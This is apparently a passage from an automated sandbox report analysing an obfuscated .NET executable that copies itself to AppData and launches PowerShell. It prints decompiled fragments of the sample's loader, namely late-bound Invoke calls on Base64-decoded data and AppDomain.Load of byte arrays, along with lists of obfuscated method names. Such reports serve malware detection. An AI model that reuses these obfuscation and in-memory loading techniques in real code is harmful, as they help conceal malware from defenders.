            Source: 72OWK7wBVH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 72OWK7wBVH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 72OWK7wBVH.exe, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.JjI3jOPHKJa4KNWkMwmixjQjB6tRRRR1BeEpy3VRYpipOTaaztVKethDsjsEhAwUYl2p7iFfpJp6,t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.m7za2xKKtdegVwRedu3YPKn2kT6RbRuWPatbJBlhjPmmIZAX7UnKgf28TWitiE1sgJcWggUkpA3y,t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.W0WkkCgllECDgzEV4cVnHods0Mc73xCs4cV19XZGzCuYmofHBx0ftqivava5AtsSfMMrfMTDCvl3,t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.Q5mwIQnwYANM2dbxwg5HRNvWqD4t1TyqzODXm3PmZT0f7q0wcvDmiRefQBFZdD3Nh2ZqCLC070Kd,dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk._5JJrp3YbG2wuYxMq1nbQi3VbvjPBUQjuP0UeIWNRwaBhZnz98cgQXyhni2RpVQtHR3zx63CgGog0jiXdM3jEa9BdsoJW2()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 72OWK7wBVH.exe, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{zQq3Lt6loepAZf8w58exR7HELs66xB1gr4ETjxu3CHETKzmAyKrQGulChtWUe[2],dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.p9G3RNlmH9EBEMqiJMtwR2r4nJYHvDjFp3E7fL3SLoYFB9xkHHOfZ5m2MOB2ZrxVLQfiWFap9jvM7fPNg2QraijykSQdV(Convert.FromBase64String(zQq3Lt6loepAZf8w58exR7HELs66xB1gr4ETjxu3CHETKzmAyKrQGulChtWUe[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: SYSTEM.0.dr, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.JjI3jOPHKJa4KNWkMwmixjQjB6tRRRR1BeEpy3VRYpipOTaaztVKethDsjsEhAwUYl2p7iFfpJp6,t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.m7za2xKKtdegVwRedu3YPKn2kT6RbRuWPatbJBlhjPmmIZAX7UnKgf28TWitiE1sgJcWggUkpA3y,t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.W0WkkCgllECDgzEV4cVnHods0Mc73xCs4cV19XZGzCuYmofHBx0ftqivava5AtsSfMMrfMTDCvl3,t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.Q5mwIQnwYANM2dbxwg5HRNvWqD4t1TyqzODXm3PmZT0f7q0wcvDmiRefQBFZdD3Nh2ZqCLC070Kd,dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk._5JJrp3YbG2wuYxMq1nbQi3VbvjPBUQjuP0UeIWNRwaBhZnz98cgQXyhni2RpVQtHR3zx63CgGog0jiXdM3jEa9BdsoJW2()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: SYSTEM.0.dr, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{zQq3Lt6loepAZf8w58exR7HELs66xB1gr4ETjxu3CHETKzmAyKrQGulChtWUe[2],dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.p9G3RNlmH9EBEMqiJMtwR2r4nJYHvDjFp3E7fL3SLoYFB9xkHHOfZ5m2MOB2ZrxVLQfiWFap9jvM7fPNg2QraijykSQdV(Convert.FromBase64String(zQq3Lt6loepAZf8w58exR7HELs66xB1gr4ETjxu3CHETKzmAyKrQGulChtWUe[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: 72OWK7wBVH.exe, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.cs.Net Code: J033fWfCzac1D6bCMUkv7RmIDDN8JrQEOEvuREEN0F10ebriwPXuvOpIZmUWe System.AppDomain.Load(byte[])
            Source: 72OWK7wBVH.exe, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.cs.Net Code: IypZUZBB7PXr6HCwe9YTI4t9CUMuUo7w57ZjtpuW3LiqKxHnWwgB8l0kmVIIM System.AppDomain.Load(byte[])
            Source: 72OWK7wBVH.exe, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.cs.Net Code: IypZUZBB7PXr6HCwe9YTI4t9CUMuUo7w57ZjtpuW3LiqKxHnWwgB8l0kmVIIM
            Source: SYSTEM.0.dr, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.cs.Net Code: J033fWfCzac1D6bCMUkv7RmIDDN8JrQEOEvuREEN0F10ebriwPXuvOpIZmUWe System.AppDomain.Load(byte[])
            Source: SYSTEM.0.dr, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.cs.Net Code: IypZUZBB7PXr6HCwe9YTI4t9CUMuUo7w57ZjtpuW3LiqKxHnWwgB8l0kmVIIM System.AppDomain.Load(byte[])
            Source: SYSTEM.0.dr, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.cs.Net Code: IypZUZBB7PXr6HCwe9YTI4t9CUMuUo7w57ZjtpuW3LiqKxHnWwgB8l0kmVIIM
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeCode function: 0_2_00007FFD9B7F00AD pushad ; iretd 0_2_00007FFD9B7F00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B6DD2A5 pushad ; iretd 1_2_00007FFD9B6DD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7F00AD pushad ; iretd 1_2_00007FFD9B7F00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8C2316 push 8B485F92h; iretd 1_2_00007FFD9B8C231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B6BD2A5 pushad ; iretd 4_2_00007FFD9B6BD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7D00AD pushad ; iretd 4_2_00007FFD9B7D00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8A2316 push 8B485F94h; iretd 4_2_00007FFD9B8A231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B6DD2A5 pushad ; iretd 7_2_00007FFD9B6DD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B7F00AD pushad ; iretd 7_2_00007FFD9B7F00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8C2316 push 8B485F92h; iretd 7_2_00007FFD9B8C231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B6BD2A5 pushad ; iretd 11_2_00007FFD9B6BD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B7D00AD pushad ; iretd 11_2_00007FFD9B7D00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8A2316 push 8B485F94h; iretd 11_2_00007FFD9B8A231B
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 15_2_00007FFD9B7F00AD pushad ; iretd 15_2_00007FFD9B7F00C1
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 16_2_00007FFD9B7E00AD pushad ; iretd 16_2_00007FFD9B7E00C1
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 18_2_00007FFD9B7F00AD pushad ; iretd 18_2_00007FFD9B7F00C1
            Source: 72OWK7wBVH.exe, t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.csHigh entropy of concatenated method names: 'JaZajQFrFQBNt7W9FLI6vNCjAG1pYfI9SvOp', 'rCHZ71i7fzQHnTMr4Fp0dptzfOYpd0ilYMsg', 'yE1XMS9DyBSjK1gsvkzaQQAM37A3wlmFXWB7', 'uXEYX0xk7tq1j9CFCYEdm4gkRqOk5mo5frDi'
            Source: 72OWK7wBVH.exe, U6Zku30C0EiuE62Nk73NfrognZKRTGES8cgjtSypwBUUvixkF6f3ZxLckAISMs5XsmQEA7MObUsARlN5e3851luVZuGS0.csHigh entropy of concatenated method names: 'UDyYDwdF6Ak4RHE8OGOzAzhel1YAhG5UCdOXhJp1rXhIvMnVLXEtTT6PYcELxcLbKIm8oxuMLzTX4Zu7ZzH95rgu1y1iz', 'GUlyea6m764KwNZoWcTiawYKgbElGLy3RpBMbL2tJ0mJaaFNk6Y4hQuMeyo1QeQmFmzR71JNxI8V9heNexBmTKarOoaWy', 'IjhkUrAy4FwV1bljMJWFwCCfkUSxeVigPXXe3jlVmxT1TTPyEVxibMDC33x5PlgewRp3BHPtHb3cfKHvvvashodHHkL1m', 'nvQJHEWr0tRWmkNLDf1qy', 'EcvWApKgDqbYc6P2PS5ii', 'FkDiF92Rq6GGhC8VcuUgw', 'JW2AcR1KR8kq1uD3dgNjE', '_2vLhe8Vepwl4Ibm4E6csP', '_9gCRLwOnBBWCXnGrB2BSf', 'CFBYu4qkzcjAm7DJZaQNH'
            Source: 72OWK7wBVH.exe, qHy0ooLmOTlb5aS12fVIvFoHxWewz0Se3YsUhp2SctmY9wAq9RfpMnmHkNM7TQAODh6JMrqoDEiR.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_5ANvHjivnU8cFEeCz3lU8y9whFWVrIOoEELK', 'ICCaDNYpZFsqDWFCxLETVPu5ielCRWDcU3iJ', '_3qWzrTaAIJpnp7LsfepvExBa8u3077ewDmJa', 'mZtLjYlShR58sNlMhW3u3pf7SYBvIVL56jXJ'
            Source: 72OWK7wBVH.exe, Ifdhep5ZECNCbsHRRrCfe9toeHkrAfH417PI4PxHARviDbB41U8jDZEo0iv9c.csHigh entropy of concatenated method names: 'Obdz0PfFXnNpSMpx4KZ4QvOaDlgeLwfwUKLCjY459lTy7QwmBpR0Gz3WtCIqj', 'MuvR27rbCBDGGVstxDDPLLVP6CJ5Il2xfwEvd1rp4n6Brs1Tb9HePutR6Fv4K', 'rFZoQlA3KPu8Wumdi4lhCtqik2CZjKC6EVLtNsniW4mScVSIcAgd1NjenbhEc', 'WkBTpEaRgl2tgCY5hoThtAILfRYbAc9z2ZSLqP9684RA3455V6ob2I12CZD7O', 'yY5jBW3XbbSg0OgFa9hYipFrzyN0DvO3RR4GaJppc0MdpFQoEq1OcGhBKXBwe', 'LNSCPZqwsxe7O2wmhJnFJHebKbeh7osQDpg0ePohYyEHSRXV23Bz5gVOvUyFc', 'Wh638lV6hbYj4PxWtfTyWyQOSXYMS9WLWUh69Z0XiFccbZw3ChEle3zztT0vy', 'fUARHc2dmHRDmdTqFBMO0BDRqVeV5lTZavvWW2HeYF2VWG0DcKs4G5ozNQ479', 'pfUh5sci1rJCizSOi5r72Y1FpMQGJec8aFVaCh5PiKIJOxW2pxX3KGqkMbNpx', 'j1HhufQoisSJiz2xSBdwUv3UZyLp0Yo74Hg2xmZj56jDrqvT7PUWToKGbuwbk'
            Source: 72OWK7wBVH.exe, dK2lc9QyLztXpN7ZzKy2rz5NrPoq5LXpmFxTCkoeUCBDyz4YvL7WvqN5SqigD.csHigh entropy of concatenated method names: '_8UxZG3a2utPxA5yZMcUCnbcGAQya3V7ABCLHFbbtNwdrqWhhU6MxRfE68YPmR', 'UCkCnVfrbYuYe9mm5Dc5uPxmfM8MlBPuOh0j77r8Gx6Rt9vsyKOJltbMRYBwW', 'ATy1EjdGyO5BqF7iYyXD2BgxffFKtNT6ZMXr6ySdmpHTaZw7JkIYc5gO1YVV3', 'l4YMaZXs98V1RMv8B9tWyjIqmu8LuaNSu9nDJmdt4CtKGvr2NoRIsCy5kJtgU', 'vAImX9kEoujUoyrA66p678IGnvXhoCMqXXkEolFz8brrqUc2kIbjfiyXddIkX', 'zlYiOK9mP3SL1oZJo3DLIILUqaxkSrWctH7pA6OB9WO4MjKLN3o4dYsv25fg4', '_3mqpx2kBXIfi1Lt9yo70pJ9mCBnxoY7TqB7q6hzp3e43UgWrJSLUdmGxJXbZF', 'XbNRTN1CCYlcFdJLVs62hOe352AFCE03I3PwqwADHf9A9e6YwyIvfuJBxbosD', 'JP9yn6vMBYizK9MDoZpL51X6r4kx9xXQXmgieIyOJueTN70YCgFFlSO3DMFm9', 'pym17g8rXNXg9ligDujJ4BlhcXYhiBQnuZYeFvX6t0GxtKu1u9LjgBNNbu7qE'
            Source: 72OWK7wBVH.exe, 08ZBSRbjUR0KD9Ydz9CJbuQiLhsDfHV45ae30cYzrN6L0PCOY21N9454XbU34JzheBTcmZlEwagX.csHigh entropy of concatenated method names: 'boFYRBqMYmPckKnTMpezhKMuiXib4nxHNjiE4CD81eexonJVDy9jfn88JX00O', 't0SY5tHLaqN6K4pn0r5NN24ZLcteiTaWLWklGB2bsiWL1pSuJBr0FtlAJLAv4', 'Hl9wT0FUsUpMZbmueOskoZ2fwt3UkJ1XBcGCFLLHWrLw6Y4N2OtG5iDdrbteQ', 'oEob4zMYD2b5lQpMq1egeOeVUz4chhQJ3ILboGGX5NDkpzvGxgPXmt8pnx52X', 'g3Dlx6HdsznNk2DoHpAQGXxZy3J52nLFa4HCqDg3lxlG2D6qM64yLBBSazefs', 'zHnqAWQtICrgySM0xQ3wsmSVwmUlt1J7GB6Q', '_5JzqFwoagf1R11TMus7YlzRYkZERgFbnnW7A', 'SLbw1McVYopbLwfVMKkc3eJgJYwUMAHeBBYb', 'cwTUcFtz9LzzGlBTLGoiqeCB8EI2gwJG7n0i', 'GeST4alERhR3XB5kvZndx4yjy6sN5NTOZVBL'
            Source: 72OWK7wBVH.exe, qr9ooIVY8SedAyIE1KdQT6CQTFrHRTk4QYnmEu0FetcSlclqqqcMY2oE6NiTR.csHigh entropy of concatenated method names: 'SPgd0Y6pdv7aEX0Pyvpyc8UtJSpCy5kLHolaT2YX9q9EDOivw1vXRXGlHETnO', 'v23kPVzxbl8L8ew5fR8ZJ', 'TVLd5CFlWBLaIndMO6j1G', 'bnO4pD2MBQohOCZusNakJ', 'BbESH4hNrfgROqhmLd0bq'
            Source: 72OWK7wBVH.exe, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.csHigh entropy of concatenated method names: '_5CaE80Segdqxce31qho4PkERjpQ8sTeHp1ONDlruJOmiTUooxp0ImAnf9wsn3', 'J033fWfCzac1D6bCMUkv7RmIDDN8JrQEOEvuREEN0F10ebriwPXuvOpIZmUWe', 'RRsS1yKmtIl0VfGxd3uSXXFakyjAfswXyXgFmzNrOqWK3u6uacmwwsjyMqy55', 'szCbaWXMHKAizyZrqspMBccWwDjz9PjZVhHT3442AaWbr8itdEiqhPxmoonHh', 'mlMfS0BYITuPz0ZAsBeDB6YD8DcisWmGbEHvvTH4p7Yohv1eAG3JXf8DElAk4', 'pfsrSxriAuLbtiNImfWKCXcRE6Nj0RQMdiSqjtOZeyRKxQVJvGIJlfYSfSeYb', 'XzspYxoo2tWqibf7NHhRV3O6GqBVs0DXPG287wlQV6HXkJdiSAy9zguify8FF', 'nwzvWb72heLEIm36XKcK1ps9oniHQOPpR5bf8DQJi7EdxPPOxT958EI005Dhz', 'GU74TOqaIOzQMZuKOUhvDH1PUeOdJYbTBA738MLfWV3xnUpToDdmtpTev54zD', 'OnQ78zI86ZDw8jrV3uq8wiZsAzwqry6mVAZOSLsa8awROREW9DCUCQKPdZwfK'
            Source: 72OWK7wBVH.exe, Znq7W6ddJes0wWEvAr9p24rge6LWO3pHNDfLWAtB2lVKj0l1w2v4p9TAa0mF9315Sx8FykofoXboFiw0XceUJRLu7tmfb.csHigh entropy of concatenated method names: 'O5TT1A6jiLuTNwTkBMsgSMTAgjRx4ZZEubohlLtqTG0tLu4WKfgBOJqZQ7aInLIHlXDoLlGT31PWK42AvgUTOitwEbqEo', 'xR4ZEh9ioGZg8aLEsy8kDq9hFF6eXWjjw2YlQ5ChgtyhHECZPso3lPKTqLyyqXnzQmYeJMllCzRvR68ZG34LcSI0XSy1F', 'EGdk2Mq50zRoGVBFNd2oQXST1kMitbJoNZjeiQxrpiagLkqmX2bWkXbsPDCtOZ3mtxNFmohbzsTSiyAtagHoD9xNmlcNx', '_8ULx8qcy11Chdwwu3GMNms0DVG18YI7iy28np9W1glUPvtuSMmeHBHxAcQ9TrokHIKG5ikXTE4jSzgOKrMj3wIU9DY0J0', 'f0GtyoyLB99QllQw9YnYW', 'gyih2PP8WNAyjFWhZhxoU', 'Mf3jPI62c1iisZCPytiN1', '_3LOHknG1TMYF4V7S4mZNg', 'oA8dVoPl4Zf7gJRZ1zUDE', 'mqp6SPsUu0tNf4dbRbP4i'
            Source: 72OWK7wBVH.exe, dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.csHigh entropy of concatenated method names: 'xiVa5oynKRJwZgEnkCPDvoezL6L0gDdME8UmyXsqaoJwJOv48BQqRYiAWdPDR993CrdGLHNGxxvbujkmks9ROIfxrJVPq', 'NpcArRkfjCMFixRJe3XB5CmYKS0LlmBerP6bWX9zW4kBx8YkH5EMdsoC4HHChyeOquHBQ5L4emZuL0zmAJe22UQOYwKgj', 'NRlN0K7tXtcwELx73tnkiRUnuVNOHCIlqpYBNWQEfv5y6CN7moktI2Sw0hUGFN5KpuUiwLnbRCpF1wSsoBAH6205MRs6v', 'VRi6nEPzmZHkdaxkAWNeZmhB2yYQxaQeNsSdCtVUsaOc1sRZbNGx2MsoIsQQbobe7BxGdfp8RVgJdzUOO6RWqiXfJEVJv', '_3F6D2cvTriqXOdNlH4VUyN5XGg02Y8b2RNSbQCRjXStt8Ljavgm3AzX5XZWMCd3H7hZzFANdiiRGZ5V3vjjfK33x8WYuK', 'QFnyDcSSyyn4hh5vVzBbaItdIiNsmfQ0A2ICK3hcS491Gq5iHxEZq0QGyfFdg5quL95UKFNukppnqTmCRWVFU6mA6GiVY', 'mOj2Zkx9VgoYHyrWS33F5wHBnT9bIpw4JayNBXyZTmVbkYAdTWDCqRdd5Y1rtFtNFPpd4kQhNKdPLRR1ZC6nMNuJPO2qR', 'pepmqv2VWndNyFEEFAO5962QhQHCENPlsF6TigDpNvePmHwGSovdl2qctXjLWQKMgouEe5jekQx5wprJbWp7KtRP8X8wD', '_8NT7lINrwdwexoQOv1qi8CtgxaiIwRPAgZgQXzxRReFJ5yE7eBRd6hRnL0RHm4Uf6JJxTtSNsx0pIti9ItW5F5gHa4yMW', 'TF0RbxnECYnXqQnIZKsp0geYDV4tLJAdwwxmHNJEd4FZIufmwnDogmm7mqCkY2ROHxoveQ7zvtyrYAc50sA77uWoo56Ft'
            Source: 72OWK7wBVH.exe, 3GqSiOnMczjgnrSizD1bqVUyz5ANfue2d6tIc52d6Q6kfRkXS7pQiPq5sulpXTR3XkYNBnSXSDUCkM7An4EQJVED6GVGo.csHigh entropy of concatenated method names: 'bjtSMovcuXuwdSIC5roMyRk9ncsYgA1WxQ09cgnQgGOOI8EtoShTEwMRbRZasRvX8D8Ne40cpgIOmsx8g1VLmS4tzPa9u', 'HubpJOl2ESbadRN3k7skn', 'zf47TkcdgvU1IG5yRCu2X', 'TEHtli70EyH48XRIyLnUX', 'fZDnMqPdsJkpIjXB4PTbm'
            Source: SYSTEM.0.dr, t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.csHigh entropy of concatenated method names: 'JaZajQFrFQBNt7W9FLI6vNCjAG1pYfI9SvOp', 'rCHZ71i7fzQHnTMr4Fp0dptzfOYpd0ilYMsg', 'yE1XMS9DyBSjK1gsvkzaQQAM37A3wlmFXWB7', 'uXEYX0xk7tq1j9CFCYEdm4gkRqOk5mo5frDi'
            Source: SYSTEM.0.dr, U6Zku30C0EiuE62Nk73NfrognZKRTGES8cgjtSypwBUUvixkF6f3ZxLckAISMs5XsmQEA7MObUsARlN5e3851luVZuGS0.csHigh entropy of concatenated method names: 'UDyYDwdF6Ak4RHE8OGOzAzhel1YAhG5UCdOXhJp1rXhIvMnVLXEtTT6PYcELxcLbKIm8oxuMLzTX4Zu7ZzH95rgu1y1iz', 'GUlyea6m764KwNZoWcTiawYKgbElGLy3RpBMbL2tJ0mJaaFNk6Y4hQuMeyo1QeQmFmzR71JNxI8V9heNexBmTKarOoaWy', 'IjhkUrAy4FwV1bljMJWFwCCfkUSxeVigPXXe3jlVmxT1TTPyEVxibMDC33x5PlgewRp3BHPtHb3cfKHvvvashodHHkL1m', 'nvQJHEWr0tRWmkNLDf1qy', 'EcvWApKgDqbYc6P2PS5ii', 'FkDiF92Rq6GGhC8VcuUgw', 'JW2AcR1KR8kq1uD3dgNjE', '_2vLhe8Vepwl4Ibm4E6csP', '_9gCRLwOnBBWCXnGrB2BSf', 'CFBYu4qkzcjAm7DJZaQNH'
            Source: SYSTEM.0.dr, qHy0ooLmOTlb5aS12fVIvFoHxWewz0Se3YsUhp2SctmY9wAq9RfpMnmHkNM7TQAODh6JMrqoDEiR.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_5ANvHjivnU8cFEeCz3lU8y9whFWVrIOoEELK', 'ICCaDNYpZFsqDWFCxLETVPu5ielCRWDcU3iJ', '_3qWzrTaAIJpnp7LsfepvExBa8u3077ewDmJa', 'mZtLjYlShR58sNlMhW3u3pf7SYBvIVL56jXJ'
            Source: SYSTEM.0.dr, Ifdhep5ZECNCbsHRRrCfe9toeHkrAfH417PI4PxHARviDbB41U8jDZEo0iv9c.csHigh entropy of concatenated method names: 'Obdz0PfFXnNpSMpx4KZ4QvOaDlgeLwfwUKLCjY459lTy7QwmBpR0Gz3WtCIqj', 'MuvR27rbCBDGGVstxDDPLLVP6CJ5Il2xfwEvd1rp4n6Brs1Tb9HePutR6Fv4K', 'rFZoQlA3KPu8Wumdi4lhCtqik2CZjKC6EVLtNsniW4mScVSIcAgd1NjenbhEc', 'WkBTpEaRgl2tgCY5hoThtAILfRYbAc9z2ZSLqP9684RA3455V6ob2I12CZD7O', 'yY5jBW3XbbSg0OgFa9hYipFrzyN0DvO3RR4GaJppc0MdpFQoEq1OcGhBKXBwe', 'LNSCPZqwsxe7O2wmhJnFJHebKbeh7osQDpg0ePohYyEHSRXV23Bz5gVOvUyFc', 'Wh638lV6hbYj4PxWtfTyWyQOSXYMS9WLWUh69Z0XiFccbZw3ChEle3zztT0vy', 'fUARHc2dmHRDmdTqFBMO0BDRqVeV5lTZavvWW2HeYF2VWG0DcKs4G5ozNQ479', 'pfUh5sci1rJCizSOi5r72Y1FpMQGJec8aFVaCh5PiKIJOxW2pxX3KGqkMbNpx', 'j1HhufQoisSJiz2xSBdwUv3UZyLp0Yo74Hg2xmZj56jDrqvT7PUWToKGbuwbk'
            Source: SYSTEM.0.dr, dK2lc9QyLztXpN7ZzKy2rz5NrPoq5LXpmFxTCkoeUCBDyz4YvL7WvqN5SqigD.csHigh entropy of concatenated method names: '_8UxZG3a2utPxA5yZMcUCnbcGAQya3V7ABCLHFbbtNwdrqWhhU6MxRfE68YPmR', 'UCkCnVfrbYuYe9mm5Dc5uPxmfM8MlBPuOh0j77r8Gx6Rt9vsyKOJltbMRYBwW', 'ATy1EjdGyO5BqF7iYyXD2BgxffFKtNT6ZMXr6ySdmpHTaZw7JkIYc5gO1YVV3', 'l4YMaZXs98V1RMv8B9tWyjIqmu8LuaNSu9nDJmdt4CtKGvr2NoRIsCy5kJtgU', 'vAImX9kEoujUoyrA66p678IGnvXhoCMqXXkEolFz8brrqUc2kIbjfiyXddIkX', 'zlYiOK9mP3SL1oZJo3DLIILUqaxkSrWctH7pA6OB9WO4MjKLN3o4dYsv25fg4', '_3mqpx2kBXIfi1Lt9yo70pJ9mCBnxoY7TqB7q6hzp3e43UgWrJSLUdmGxJXbZF', 'XbNRTN1CCYlcFdJLVs62hOe352AFCE03I3PwqwADHf9A9e6YwyIvfuJBxbosD', 'JP9yn6vMBYizK9MDoZpL51X6r4kx9xXQXmgieIyOJueTN70YCgFFlSO3DMFm9', 'pym17g8rXNXg9ligDujJ4BlhcXYhiBQnuZYeFvX6t0GxtKu1u9LjgBNNbu7qE'
            Source: SYSTEM.0.dr, 08ZBSRbjUR0KD9Ydz9CJbuQiLhsDfHV45ae30cYzrN6L0PCOY21N9454XbU34JzheBTcmZlEwagX.csHigh entropy of concatenated method names: 'boFYRBqMYmPckKnTMpezhKMuiXib4nxHNjiE4CD81eexonJVDy9jfn88JX00O', 't0SY5tHLaqN6K4pn0r5NN24ZLcteiTaWLWklGB2bsiWL1pSuJBr0FtlAJLAv4', 'Hl9wT0FUsUpMZbmueOskoZ2fwt3UkJ1XBcGCFLLHWrLw6Y4N2OtG5iDdrbteQ', 'oEob4zMYD2b5lQpMq1egeOeVUz4chhQJ3ILboGGX5NDkpzvGxgPXmt8pnx52X', 'g3Dlx6HdsznNk2DoHpAQGXxZy3J52nLFa4HCqDg3lxlG2D6qM64yLBBSazefs', 'zHnqAWQtICrgySM0xQ3wsmSVwmUlt1J7GB6Q', '_5JzqFwoagf1R11TMus7YlzRYkZERgFbnnW7A', 'SLbw1McVYopbLwfVMKkc3eJgJYwUMAHeBBYb', 'cwTUcFtz9LzzGlBTLGoiqeCB8EI2gwJG7n0i', 'GeST4alERhR3XB5kvZndx4yjy6sN5NTOZVBL'
            Source: SYSTEM.0.dr, qr9ooIVY8SedAyIE1KdQT6CQTFrHRTk4QYnmEu0FetcSlclqqqcMY2oE6NiTR.csHigh entropy of concatenated method names: 'SPgd0Y6pdv7aEX0Pyvpyc8UtJSpCy5kLHolaT2YX9q9EDOivw1vXRXGlHETnO', 'v23kPVzxbl8L8ew5fR8ZJ', 'TVLd5CFlWBLaIndMO6j1G', 'bnO4pD2MBQohOCZusNakJ', 'BbESH4hNrfgROqhmLd0bq'
            Source: SYSTEM.0.dr, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.csHigh entropy of concatenated method names: '_5CaE80Segdqxce31qho4PkERjpQ8sTeHp1ONDlruJOmiTUooxp0ImAnf9wsn3', 'J033fWfCzac1D6bCMUkv7RmIDDN8JrQEOEvuREEN0F10ebriwPXuvOpIZmUWe', 'RRsS1yKmtIl0VfGxd3uSXXFakyjAfswXyXgFmzNrOqWK3u6uacmwwsjyMqy55', 'szCbaWXMHKAizyZrqspMBccWwDjz9PjZVhHT3442AaWbr8itdEiqhPxmoonHh', 'mlMfS0BYITuPz0ZAsBeDB6YD8DcisWmGbEHvvTH4p7Yohv1eAG3JXf8DElAk4', 'pfsrSxriAuLbtiNImfWKCXcRE6Nj0RQMdiSqjtOZeyRKxQVJvGIJlfYSfSeYb', 'XzspYxoo2tWqibf7NHhRV3O6GqBVs0DXPG287wlQV6HXkJdiSAy9zguify8FF', 